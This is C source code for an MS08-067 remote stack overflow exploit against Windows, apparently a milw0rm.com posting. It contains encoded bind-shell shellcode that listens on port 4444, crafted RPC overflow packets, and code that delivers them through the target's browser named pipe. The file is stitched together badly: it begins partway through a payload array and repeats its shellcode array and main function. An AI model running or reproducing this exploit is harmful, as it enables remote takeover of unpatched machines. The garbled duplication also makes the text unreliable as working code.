"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xCC\x41"
"\x00\x00\x00\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
"\x00\x00"
"\x01\x00\x00\x00\x01\x00\x00\x00";
unsigned char bind_shellcode[] =
// "\xCC"
// "\x83\xEC\x40" // sub esp, 0x70
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xad"
"\x07\xe6\x4a\x83\xeb\xfc\xe2\xf4\x51\x6d\x0d\x07\x45\xfe\x19\xb5"
"\x52\x67\x6d\x26\x89\x23\x6d\x0f\x91\x8c\x9a\x4f\xd5\x06\x09\xc1"
"\xe2\x1f\x6d\x15\x8d\x06\x0d\x03\x26\x33\x6d\x4b\x43\x36\x26\xd3"
"\x01\x83\x26\x3e\xaa\xc6\x2c\x47\xac\xc5\x0d\xbe\x96\x53\xc2\x62"
"\xd8\xe2\x6d\x15\x89\x06\x0d\x2c\x26\x0b\xad\xc1\xf2\x1b\xe7\xa1"
"\xae\x2b\x6d\xc3\xc1\x23\xfa\x2b\x6e\x36\x3d\x2e\x26\x44\xd6\xc1"
"\xed\x0b\x6d\x3a\xb1\xaa\x6d\x0a\xa5\x59\x8e\xc4\xe3\x09\x0a\x1a"
"\x52\xd1\x80\x19\xcb\x6f\xd5\x78\xc5\x70\x95\x78\xf2\x53\x19\x9a"
"\xc5\xcc\x0b\xb6\x96\x57\x19\x9c\xf2\x8e\x03\x2c\x2c\xea\xee\x48"
"\xf8\x6d\xe4\xb5\x7d\x6f\x3f\x43\x58\xaa\xb1\xb5\x7b\x54\xb5\x19"
"\xfe\x54\xa5\x19\xee\x54\x19\x9a\xcb\x6f\xf7\x16\xcb\x54\x6f\xab"
"\x38\x6f\x42\x50\xdd\xc0\xb1\xb5\x7b\x6d\xf6\x1b\xf8\xf8\x36\x22"
"\x09\xaa\xc8\xa3\xfa\xf8\x30\x19\xf8\xf8\x36\x22\x48\x4e\x60\x03"
"\xfa\xf8\x30\x1a\xf9\x53\xb3\xb5\x7d\x94\x8e\xad\xd4\xc1\x9f\x1d"
"\x52\xd1\xb3\xb5\x7d\x61\x8c\x2e\xcb\x6f\x85\x27\x24\xe2\x8c\x1a"
"\xf4\x2e\x2a\xc3\x4a\x6d\xa2\xc3\x4f\x36\x26\xb9\x07\xf9\xa4\x67"
"\x53\x45\xca\xd9\x20\x7d\xde\xe1\x06\xac\x8e\x38\x53\xb4\xf0\xb5"
"\xd8\x43\x19\x9c\xf6\x50\xb4\x1b\xfc\x56\x8c\x4b\xfc\x56\xb3\x1b"
"\x52\xd7\x8e\xe7\x74\x02\x28\x19\x52\xd1\x8c\xb5\x52\x30\x19\x9a"
"\x26\x50\x1a\xc9\x69\x63\x19\x9c\xff\xf8\x36\x22\x42\xc9\x06\x2a"
"\xfe\xf8\x30\xb5\x7d\x07\xe6\x4a";
int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer)
{
BYTE rbuf[0x1000]="";
DWORD dw=0;
struct RPCBIND RPCBind;
memcpy(&RPCBind,&PRPC,sizeof(RPCBind));
UuidFromString((unsigned char *)Interface,&RPCBind.InterfaceUUID);
UuidToString(&RPCBind.InterfaceUUID,(unsigned char **)&Interface);
RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);
RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);
TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf,sizeof(rbuf), &dw, NULL);
return 0;
}
int main(int argc, char* argv[])
{
char *server;
NETRESOURCE nr;
char unc[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;
WSADATA wsa;
int bwritten=0;
BYTE rbuf[0x100]="";
DWORD dw;
PVOID ptr = (PVOID)&POP;
printf( "\tMS08-067 Remote Stack Overflow Vulnerability Exploit(POC)\n\n" );
printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/10/27\n" );
printf( "Thanks isno and PolyMeta\n" );
printf( "ShellCode Function: bindshell port:4444\n" );
printf( "usage:\n%s [IP]\n", argv[0] );
if ( argc != 2 ) {
return 0;
}
if ( WSAStartup(MAKEWORD(2,2),&wsa) != 0 ) {
printf( "WSAStartup failed\n" );
return 0;
}
memcpy((char *)ptr + 74, bind_shellcode, sizeof(bind_shellcode)-1);
server=argv[1];
_snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
unc[sizeof(unc)-1] = 0;
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = unc;
nr.lpProvider = NULL;
printf( "connect %s ipc$ .... ", server );
if ( WNetAddConnection2(&nr, "", "", 0) != 0 ) {
printf( "failed\n" );
return 0;
} else {
printf( "success!\n" );
}
_snprintf(szPipe, sizeof(szPipe),"\\\\%s\\pipe\\browser",server);
printf( "open \\\\%s\\pipe\\browser ....", server );
hFile = CreateFile( szPipe,
GENERIC_READ|GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING, 0, NULL);
if ( hFile == (HANDLE)-1 ) {
printf( "failed!\n" );
return 0;
} else {
printf( "success!\n" );
}
printf( "Bind Rpc 4b324fc8-1670-01d3-1278-5a47bf6ee188 Interface\n" );
BindRpcInterface(hFile,"4b324fc8-1670-01d3-1278-5a47bf6ee188","3.0");
printf( "Send shellcode ....\n" );
TransactNamedPipe(hFile, (PVOID)&POP, sizeof(POP) - 1, rbuf, sizeof(rbuf), &dw, NULL);
printf( "Send Exploit ...... \n" );
TransactNamedPipe(hFile, (PVOID)&EXPLOIT, sizeof(EXPLOIT) - 1, rbuf, sizeof(rbuf), &dw, NULL);
CloseHandle( hFile );
return 0;
}
// milw0rm.com [2008-11-12]
/*
MS08-067 Remote Stack Overflow Vulnerability Exploit
Author: Polymorphours
Email: Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date: 2008-10-28
*/
#include "stdafx.h"
#include <winsock2.h>
#include <Rpc.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
#pragma comment(lib, "ws2_32")
struct RPCBIND
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
WORD MaxXmitFrag;
WORD MaxRecvFrag;
DWORD AssocGroup;
BYTE NumCtxItems;
WORD ContextID;
WORD NumTransItems;
GUID InterfaceUUID;
WORD InterfaceVerMaj;
WORD InterfaceVerMin;
GUID TransferSyntax;
DWORD SyntaxVer;
};
struct RPCFUNC
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
DWORD AllocHint;
WORD ContextID;
WORD Opnum;
};
BYTE PRPC[0x48] = {
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
BYTE EXPLOIT[] =
"\x05\x00"
"\x00\x03\x10\x00\x00\x00\xA4\x00\x00\x00\x01\x00\x00\x00\x94\x00"
"\x00\x00\x00\x00\x1f\x00"
"\x00\x00\x00\x00"
"\x2F\x00\x00\x00\x00\x00\x00\x00\x2F\x00\x00\x00"
"\x5c\x00"
"\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
"\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x12\x45\xfa\x7f" // jmp esp
"\x90\x8B\xF4\x81"
"\x3E\x90\x90\x90\x90\x74\x04\x4E\x4E\xEB\xF4\x33\xC9\x33\xDB\xB1"
"\x01\xC1\xE1\x09\x8B\xFC\x4B\xC1\xE3\x0D\x23\xFB\x57\xF3\xA4\x5F"
// "\xB1\x01\xC1\xE1\x09\x2B\xE1\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"
"\x83\xEC\x70\x90\x90\x90\x90\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"
"\x00\x00\x00\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
"\x00\x00"
"\x01\x00\x00\x00\x01\x00\x00\x00";
BYTE POP[] =//stub header RPCFUNC structure
"\x05\x00"
"\x00\x03\x10\x00\x00\x00\xE4\x01\x00\x00\x01\x00\x00\x00\xD4\x01"
"\x00\x00\x00\x00\x1f\x00"
"\x00\x00\x00\x00"
"\xCF\x00\x00\x00\x00\x00\x00\x00\xCF\x00\x00\x00"
"\x5c\x00"
"\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xCC\x41"
"\x00\x00\x00\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
"\x00\x00"
"\x01\x00\x00\x00\x01\x00\x00\x00";
unsigned char bind_shellcode[] =
// "\xCC"
// "\x83\xEC\x40" // sub esp, 0x70
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xad"
"\x07\xe6\x4a\x83\xeb\xfc\xe2\xf4\x51\x6d\x0d\x07\x45\xfe\x19\xb5"
"\x52\x67\x6d\x26\x89\x23\x6d\x0f\x91\x8c\x9a\x4f\xd5\x06\x09\xc1"
"\xe2\x1f\x6d\x15\x8d\x06\x0d\x03\x26\x33\x6d\x4b\x43\x36\x26\xd3"
"\x01\x83\x26\x3e\xaa\xc6\x2c\x47\xac\xc5\x0d\xbe\x96\x53\xc2\x62"
"\xd8\xe2\x6d\x15\x89\x06\x0d\x2c\x26\x0b\xad\xc1\xf2\x1b\xe7\xa1"
"\xae\x2b\x6d\xc3\xc1\x23\xfa\x2b\x6e\x36\x3d\x2e\x26\x44\xd6\xc1"
"\xed\x0b\x6d\x3a\xb1\xaa\x6d\x0a\xa5\x59\x8e\xc4\xe3\x09\x0a\x1a"
"\x52\xd1\x80\x19\xcb\x6f\xd5\x78\xc5\x70\x95\x78\xf2\x53\x19\x9a"
"\xc5\xcc\x0b\xb6\x96\x57\x19\x9c\xf2\x8e\x03\x2c\x2c\xea\xee\x48"
"\xf8\x6d\xe4\xb5\x7d\x6f\x3f\x43\x58\xaa\xb1\xb5\x7b\x54\xb5\x19"
"\xfe\x54\xa5\x19\xee\x54\x19\x9a\xcb\x6f\xf7\x16\xcb\x54\x6f\xab"
"\x38\x6f\x42\x50\xdd\xc0\xb1\xb5\x7b\x6d\xf6\x1b\xf8\xf8\x36\x22"
"\x09\xaa\xc8\xa3\xfa\xf8\x30\x19\xf8\xf8\x36\x22\x48\x4e\x60\x03"
"\xfa\xf8\x30\x1a\xf9\x53\xb3\xb5\x7d\x94\x8e\xad\xd4\xc1\x9f\x1d"
"\x52\xd1\xb3\xb5\x7d\x61\x8c\x2e\xcb\x6f\x85\x27\x24\xe2\x8c\x1a"
"\xf4\x2e\x2a\xc3\x4a\x6d\xa2\xc3\x4f\x36\x26\xb9\x07\xf9\xa4\x67"
"\x53\x45\xca\xd9\x20\x7d\xde\xe1\x06\xac\x8e\x38\x53\xb4\xf0\xb5"
"\xd8\x43\x19\x9c\xf6\x50\xb4\x1b\xfc\x56\x8c\x4b\xfc\x56\xb3\x1b"
"\x52\xd7\x8e\xe7\x74\x02\x28\x19\x52\xd1\x8c\xb5\x52\x30\x19\x9a"
"\x26\x50\x1a\xc9\x69\x63\x19\x9c\xff\xf8\x36\x22\x42\xc9\x06\x2a"
"\xfe\xf8\x30\xb5\x7d\x07\xe6\x4a";
int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer)
{
BYTE rbuf[0x1000]="";
DWORD dw=0;
struct RPCBIND RPCBind;
memcpy(&RPCBind,&PRPC,sizeof(RPCBind));
UuidFromString((unsigned char *)Interface,&RPCBind.InterfaceUUID);
UuidToString(&RPCBind.InterfaceUUID,(unsigned char **)&Interface);
RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);
RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);
TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf,sizeof(rbuf), &dw, NULL);
return 0;
}
int main(int argc, char* argv[])
{
char *server;
NETRESOURCE nr;
char unc[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;
WSADATA wsa;
int bwritten=0;
BYTE rbuf[0x100]="";
DWORD dw;
PVOID ptr = (PVOID)&POP;
printf( "\tMS08-067 Remote Stack Overflow Vulnerability Exploit(POC)\n\n" );
printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/10/27\n" );
printf( "Thanks isno and PolyMeta\n" );
printf( "ShellCode Function: bindshell port:4444\n" );
printf( "usage:\n%s [IP]\n", argv[0] );
if ( argc != 2 ) {
return 0;
}
if ( WSAStartup(MAKEWORD(2,2),&wsa) != 0 ) {
printf( "WSAStartup failed\n" );
return 0;
}
memcpy((char *)ptr + 74, bind_shellcode, sizeof(bind_shellcode)-1);
server=argv[1];
_snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
unc[sizeof(unc)-1] = 0;
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = unc;
nr.lpProvider = NULL;
printf( "connect %s ipc$ .... ", server );
if ( WNetAddConnection2(&nr, "", "", 0) != 0 ) {
printf( "failed\n" );
return 0;
} else {
printf( "success!\n" );
}
_snprintf(szPipe, sizeof(szPipe),"\\\\%s\\pipe\\browser",server);
printf( "open \\\\%s\\pipe\\browser ....", server );
hFile = CreateFile( szPipe,
GENERIC_READ|GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING, 0, NULL);
if ( hFile == (HANDLE)-1 ) {
printf( "failed!\n" );
return 0;
} else {
printf( "success!\n" );
}
printf( "Bind Rpc 4b324fc8-1670-01d3-1278-5a47bf6ee188 Interface\n" );
BindRpcInterface(hFile,"4b324fc8-1670-01d3-1278-5a47bf6ee188","3.0");
printf( "Send shellcode ....\n" );
TransactNamedPipe(hFile, (PVOID)&POP, sizeof(POP) - 1, rbuf, sizeof(rbuf), &dw, NULL);
printf( "Send Exploit ...... \n" );
TransactNamedPipe(hFile, (PVOID)&EXPLOIT, sizeof(EXPLOIT) - 1, rbuf, sizeof(rbuf), &dw, NULL);
CloseHandle( hFile );
return 0;
}
// milw0rm.com [2008-11-12]